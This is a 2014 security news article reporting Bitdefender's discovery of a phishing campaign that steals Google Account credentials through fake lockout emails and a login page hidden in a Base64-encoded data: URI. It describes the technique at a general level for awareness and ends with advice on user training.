A new phishing scheme is being used to steal Google Account credentials

by paganinip on May 15th, 2014

Security experts at Bitdefender discovered a new ingenious phishing scheme that is being used by hackers to steal Google Account credentials.

Security experts at Bitdefender have discovered a news phishing scheme adopted by hackers to steal Google Account passwords.

The new phishing attack is hard to catch with traditional heuristic detection, it mainly affects Google Chrome and Mozilla Firefox internet browsers.

The hackers send an email that pretends to be from Google, it warns victim that his account will be locked in the next 24 hours because the associated InBox has reached the maximum capability.

“With access to users’ Google accounts, hackers can buy apps on Google Play, hijack Google+ accounts and access confidential Google Drive documents,”“The scam starts with an email allegedly sent by Google, with “Mail Notice” or “New Lockout Notice” as a subject.” reports Catalin Cosoi, chief security strategist at Bitdefender  in the official blog post.

To avoid that the Google account will be “locked in 24 hours” the user is invited to go to the “INSTANT INCREASE” link, but the link redirects victims to a bogus Google web log-page. Using this artifice, hackers can steal Google account credentials within the browser.

Cosoi explained that it is very difficult for users to note the attack because the fake Google web log-page goes undetected by Google’s Chrome uniform resource identifiers (URIs). The attackers exploit the way Google Chrome displays “data:” URIs.

Users will display “data:” in the address bar of their browser, which indicates the use of a data Uniform Resource Identifier scheme, the URI scheme allows attackers to include data in-line in web pages as if they were external resources.

“The scheme uses Base 64 encoding to represent file contents, in this case supplying the content of the fake web page in an encoded string within the data URI. As Google Chrome doesn’t show the whole string, regular users have a hard time figuring out they are targeted in a phishing attack and may give their data to cyber-criminals.” states the post.

Bitdefender says that the scammers are able to avoid detection, by using a data URI scheme, which includes data in-line web pages as if they are external sources. The content from the fake webpage is encoded in the string with the data URI scheme, the attackers used Base64 coding to represent the file contents.

According Bitdefender the more than a thousand users were deceived by the phishing scheme.

“So far, more than a thousand users clicked on a single shortened URL used in the cyber-campaign. The numbers are without doubt a lot higher, as scammers create more than a single URL when crafting a phishing wave,” added Cosoi.

Phishing is becoming one of the most popular fraudulent activities in the cyber criminal ecosystem, hackers are exploiting new platforms like mobile and social media according the report of principal security firms.

Cyber criminals are trying to make phishing attacks harder to detect optimizing their email targeting, attackers are demonstrating to be able to find new methods of bypassing checks implemented by email providers and security firms.

Usually a targeted attack exploits the “human factor“, phishing offensives rely on social engineering techniques that is why is important to inform users of the tactics adopted by cyber criminals.

Organizations must train their personnel to reduce their human attack surface and avoid to be victims of such attacks.

Be careful!

Pierluigi Paganini

(Security Affairs –  Google account, phishing)